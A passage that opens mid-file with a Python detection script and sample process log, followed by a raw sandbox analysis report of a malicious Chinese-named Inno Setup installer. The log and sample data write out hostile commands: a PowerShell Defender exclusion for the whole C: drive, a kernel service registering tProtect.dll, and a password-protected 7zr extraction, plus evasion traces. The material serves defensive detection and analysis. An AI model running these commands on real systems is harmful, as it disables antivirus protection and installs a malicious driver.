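Event = namedtuple("Event", "line parent image cmdline")

# Constructed sample of process-creation events (parent|image|command line), modelled on the
# command lines in this report; the last three lines are benign controls. Not a real log export.
SAMPLE_LOG = r"""
C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\setup.tmp|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\setup.tmp|C:\Users\user\Desktop\setup.exe|"C:\Users\user\Desktop\setup.exe" /VERYSILENT
C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\setup.tmp|C:\Program Files (x86)\Windows NT\7zr.exe|7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start CleverSoar
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start CleverSoar
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start CleverSoar
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start CleverSoar
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start CleverSoar
C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\user\notes.txt
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc create ExampleDrv binPath= "C:\Windows\System32\drivers\example.sys" type= kernel start= demand
C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc start ExampleDrv
"""

SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(\S+)(.*)", re.I)
SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.I)
BINPATH = re.compile(r'binpath=\s*(?:"([^"]*)"|(\S+))', re.I)
MP_EXCLUSION = re.compile(r"""add-mppreference\b.*?-exclusion(?:path|process|extension)\s+['"]?([^'"]+)""", re.I)
ARCHIVERS = {"7z.exe", "7za.exe", "7zr.exe"}
NON_ARCHIVE_EXT = re.compile(r"\s(\S+\.(?:dat|bin|txt|tmp|jpg|png|log))(?:\s|$)", re.I)
INNO_TEMP_PARENT = re.compile(r"\\is-[A-Z0-9]+\.tmp\\", re.I)   # Inno Setup's temp directory naming

def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.count("|") < 2:            # blank or malformed line
            continue
        parent, image, cmdline = line.split("|", 2)
        events.append(Event(len(events) + 1, parent, image, cmdline))
    return events

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_defender_exclusion(e):
    """PowerShell adding a Defender exclusion; an exclusion for a drive root covers everything on it."""
    if basename(e.image) != "powershell.exe":
        return None
    m = MP_EXCLUSION.search(e.cmdline)
    return ("defender_exclusion_added", m.group(1).strip()) if m else None

def rule_kernel_service(e):
    """sc create type= kernel whose binPath is not a .sys under System32\\drivers."""
    m = SC_CREATE.search(e.cmdline)
    if basename(e.image) != "sc.exe" or not m or not re.search(r"type=\s*kernel\b", m.group(2), re.I):
        return None
    bp = BINPATH.search(m.group(2))
    if not bp:
        return ("kernel_service_without_binpath", m.group(1))
    path = (bp.group(1) or bp.group(2)).strip()
    if path.lower().endswith(".sys") and "\\windows\\system32\\drivers\\" in path.lower():
        return None
    return ("kernel_service_unusual_binpath", f"{m.group(1)} -> {path}")

def rule_password_archive(e):
    """7-Zip extracting a password-protected (-p) archive whose name carries a non-archive extension."""
    if basename(e.image) not in ARCHIVERS:
        return None
    has_pw = re.search(r"(?:^|\s)-p\S+", e.cmdline)
    arc = NON_ARCHIVE_EXT.search(e.cmdline)
    return ("password_protected_archive_disguised", arc.group(1)) if has_pw and arc else None

def rule_silent_relaunch(e):
    """An Inno Setup stub (parent inside an is-XXXXX.tmp directory) relaunching an installer with /VERYSILENT."""
    if INNO_TEMP_PARENT.search(e.parent) and re.search(r"/verysilent\b", e.cmdline, re.I):
        return ("inno_setup_silent_relaunch", e.cmdline)
    return None

RULES = (rule_defender_exclusion, rule_kernel_service, rule_password_archive, rule_silent_relaunch)

def start_bursts(events, threshold=5):
    """Service names that sc.exe was asked to start at least `threshold` times."""
    counts = Counter()
    for e in events:
        m = SC_START.search(e.cmdline)
        if m and basename(e.image) == "sc.exe":
            counts[m.group(1)] += 1
    return {name: n for name, n in counts.items() if n >= threshold}

def detect(log_text, burst_threshold=5):
    """Return per-event rule hits and the aggregate service-start bursts for a log."""
    events = parse_log(log_text)
    alerts = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                alerts.append((e.line, hit[0], hit[1]))
    return {"alerts": alerts, "start_bursts": start_bursts(events, burst_threshold)}

if __name__ == "__main__":
    result = detect(SAMPLE_LOG)
    for line, name, detail in result["alerts"]:
        print(f"line {line}: {name}: {detail}")
    for svc, n in result["start_bursts"].items():
        print(f"sc start {svc} seen {n} times")
```

To use this on real telemetry, feed the ParentImage, Image and CommandLine fields of Sysmon Event ID 1 (or the equivalent Security 4688 fields) into parse_log in the same parent|image|cmdline shape. The per-event rules fire on the first four lines only; the two sc create lines show why the binPath check matters, since a kernel service pointing at a .sys under System32\drivers is routine while one pointing at a .dll under Program Files (x86) is not.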
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static file information: File size 5707684 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2167599530.0000000003410000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2167479106.0000000003210000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_004E57D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: real checksum: 0x0 should be: 0x579ef1
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: is-TAP4G.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE486EB push ecx; ret 6_2_6CE486FE
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CCF0F00 push ss; retn 0001h6_2_6CCF0F0A
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF16F10 push eax; ret 6_2_6CF16F2E
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE7B9F4 push 004AC35Ch; ret 6_2_6CE7BA0E
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CF17290 push eax; ret 6_2_6CF172BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004645F4 push 0050C35Ch; ret 10_2_0046460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FFB10 push eax; ret 10_2_004FFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004FFE90 push eax; ret 10_2_004FFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\is-TAP4G.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66O9A.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IT23Q.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3398
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Window / User API: threadDelayed 643
